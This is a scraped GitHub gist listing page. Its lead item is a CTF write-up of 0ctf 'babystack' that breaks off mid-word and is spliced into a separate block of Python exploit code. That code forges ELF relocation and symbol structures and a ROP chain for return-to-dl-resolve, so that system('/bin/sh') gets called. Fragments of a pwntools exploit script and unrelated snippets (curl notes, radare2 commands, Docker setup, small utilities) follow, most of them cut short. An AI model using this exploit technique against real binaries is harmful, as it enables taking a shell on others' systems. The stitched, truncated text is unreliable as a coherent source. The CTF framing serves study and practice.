cExplr cExplr

🎯
Focusing
View GitHub Profile
@ricardo2197
ricardo2197 / return to dl-resolve.md
Last active August 4, 2025 19:13
Return-to dl-resolve

0ctf babystack with return-to dl-resolve

In this write-up I describe how I solved the challenge "babystack" from 0ctf with a technique called return-to-dl-resolve. I did not know this kind of return-to attack before the contest. The following sections explain the entire exploit in detail.

1. Binary analysis

I downloaded the provided binary babystack and fired up binaryninja alongside gdb to analyze it. I quickly realized a buffer overflow vulnerability is present within sub_804843b. My first approach was a return-to-libc attack: leak the base address of the library and call system in order to get a shell.
This technique is contingent on:

  1. Leaking the libc base address
  2. Knowing the version of libc, to get the offset of system from that base.

However, the version of libc on the remote server was unknown and the ELF did not provide any function that can be us
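Return-to-dl-resolve sidesteps both requirements: instead of needing the address of system, the attacker returns into PLT[0] with a forged relocation index, so that the dynamic linker's own lookup (_dl_fixup on i386) reads an attacker-supplied Elf32_Rel and Elf32_Sym from writable memory, resolves the string "system" from libc for us, and calls it. The block below is an added example, not code from the write-up or the babystack exploit: it builds the forged structures, computes the reloc_arg that PLT[0] passes to the resolver, and then walks the same pointer chain the resolver walks to confirm that it lands on the intended symbol name. The addresses PLT0, REL_PLT, DYNSYM, DYNSTR and the scratch area 0x0804a020 are hypothetical non-PIE i386 values chosen for illustration; on a real target read them from `readelf -d` and `readelf -S`.

```python
import struct

# Hypothetical i386, non-PIE layout used only for illustration. These are NOT
# the babystack addresses; take real ones from `readelf -d` / `readelf -S`.
PLT0 = 0x08048380      # PLT[0]: push link_map ; jmp *_dl_runtime_resolve
REL_PLT = 0x08048310   # DT_JMPREL, start of .rel.plt
DYNSYM = 0x080481cc    # DT_SYMTAB, start of .dynsym
DYNSTR = 0x0804822c    # DT_STRTAB, start of .dynstr

R_386_JMP_SLOT = 7
ELF32_REL_FMT = "<II"        # r_offset, r_info
ELF32_SYM_FMT = "<IIIBBH"    # st_name, st_value, st_size, st_info, st_other, st_shndx
REL_SIZE = struct.calcsize(ELF32_REL_FMT)  # 8
SYM_SIZE = struct.calcsize(ELF32_SYM_FMT)  # 16


def align_up(value, alignment):
    return (value + alignment - 1) & ~(alignment - 1)


def build_fake_structs(base, symbol, argument):
    """Lay out a forged Elf32_Rel, Elf32_Sym and two strings at writable `base`.

    Returns (blob, reloc_arg, arg_addr): `blob` is written to `base` (e.g. with a
    read() gadget), `reloc_arg` is pushed before returning to PLT0, and
    `arg_addr` is the address of `argument` for the resolved call.
    """
    rel_addr = base
    # _dl_fixup indexes .dynsym with (r_info >> 8) * sizeof(Elf32_Sym), so the
    # forged Elf32_Sym must be 16-byte aligned relative to DYNSYM.
    sym_addr = DYNSYM + align_up(rel_addr + REL_SIZE - DYNSYM, SYM_SIZE)
    name_addr = sym_addr + SYM_SIZE
    arg_addr = name_addr + len(symbol) + 1
    # r_offset must point at writable memory: the resolver stores the result there.
    slot_addr = align_up(arg_addr + len(argument) + 1, 4)

    sym_index = (sym_addr - DYNSYM) // SYM_SIZE
    r_info = (sym_index << 8) | R_386_JMP_SLOT
    rel = struct.pack(ELF32_REL_FMT, slot_addr, r_info)
    # st_info 0x12 = STB_GLOBAL | STT_FUNC; st_shndx 0 = SHN_UNDEF, so the
    # linker searches the loaded libraries (libc) for the name.
    sym = struct.pack(ELF32_SYM_FMT, name_addr - DYNSTR, 0, 0, 0x12, 0, 0)

    blob = bytearray(rel)
    blob += b"\x00" * (sym_addr - (rel_addr + REL_SIZE))
    blob += sym
    blob += symbol.encode() + b"\x00"
    blob += argument.encode() + b"\x00"
    blob += b"\x00" * (slot_addr + 4 - (base + len(blob)))
    return bytes(blob), rel_addr - REL_PLT, arg_addr


def build_rop_chain(reloc_arg, arg_addr, ret_after=0xdeadbeef):
    """Stack after the overflow: return into PLT0 exactly as a PLT stub would,
    so the resolved function sees [ret_after][arg_addr] as its frame."""
    return struct.pack("<IIII", PLT0, reloc_arg, ret_after, arg_addr)


def emulate_dl_fixup(blob, base, reloc_arg):
    """Follow the pointers the way _dl_fixup does, treating `blob` as the memory
    at `base`; return (symbol name looked up, address the result is written to)."""
    def read(addr, n):
        off = addr - base
        if not 0 <= off <= len(blob) - n:
            raise ValueError("resolver dereference outside forged region: 0x%x" % addr)
        return blob[off:off + n]

    rel_addr = REL_PLT + reloc_arg
    r_offset, r_info = struct.unpack(ELF32_REL_FMT, read(rel_addr, REL_SIZE))
    if r_info & 0xff != R_386_JMP_SLOT:
        raise ValueError("bad relocation type")
    sym_addr = DYNSYM + (r_info >> 8) * SYM_SIZE
    st_name = struct.unpack(ELF32_SYM_FMT, read(sym_addr, SYM_SIZE))[0]
    name_addr = DYNSTR + st_name
    name = read(name_addr, len(blob) - (name_addr - base)).split(b"\x00", 1)[0]
    return name.decode(), r_offset


if __name__ == "__main__":
    blob, reloc_arg, arg_addr = build_fake_structs(0x0804a020, "system", "/bin/sh")
    print("reloc_arg = 0x%x, arg_addr = 0x%x" % (reloc_arg, arg_addr))
    print("resolver would look up:", emulate_dl_fixup(blob, 0x0804a020, reloc_arg)[0])
```

One caveat the emulation does not model: if the binary carries DT_VERSYM, _dl_fixup also reads vernum[sym_index] and dereferences the matching l_versions entry. With a large forged index that read can land on unmapped memory, so verify the chosen scratch address in gdb before relying on it; pwntools' Ret2dlresolvePayload exists precisely to get this bookkeeping right.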

@fedochet
fedochet / js-beautify-from-java.java
Created February 18, 2018 23:47
Calling javascript beautifier from java
import javax.script.Invocable;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;
import java.io.InputStreamReader;
public class JavascriptBeautifierForJava {
    // my javascript beautifier of choice
    private static final String BEAUTIFY_JS_RESOURCE = "beautify.js";
@jiulongw
jiulongw / sss.py
Created February 27, 2017 17:02
Sample pwntool usage
# Credits to https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-signed-shell-server/
from pwn import * # noqa
import string
import random
velf = ELF("./sss")
# this is the byte we'd need...
last_byte = velf.symbols['exec_command'] & 0xff
log.info("last byte of exec_command 0x{:x}".format(last_byte))
@xposedbones
xposedbones / map.js
Last active September 10, 2025 14:27
Javascript Map range of number to another range
Number.prototype.map = function (in_min, in_max, out_min, out_max) {
    return (this - in_min) * (out_max - out_min) / (in_max - in_min) + out_min;
}

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@subfuzion
subfuzion / curl.md
Last active October 11, 2025 00:58
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*
@elliotchance
elliotchance / brainfuck.py
Created January 19, 2016 11:52
Write Your Own Brainfuck Compiler
import sys
import ply.yacc as yacc
import ply.lex as lex
tokens = (
    'INCREMENT',
    'DECREMENT',
    'SHIFT_LEFT',
    'SHIFT_RIGHT',
    'OUTPUT',
@joyrexus
joyrexus / README.md
Last active April 19, 2025 09:46 — forked from btoone/curl.md
curl tutorial

An introduction to curl using GitHub's API.

Basics

Makes a basic GET request to the specified URI

curl https://api.github.com/users/caspyin

Includes HTTP-Header information in the output

@vladignatyev
vladignatyev / progress.py
Last active December 2, 2024 17:14
Python command line progress bar in less than 10 lines of code.
# The MIT License (MIT)
# Copyright (c) 2016 Vladimir Ignatev
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software
# is furnished to do so, subject to the following conditions:
#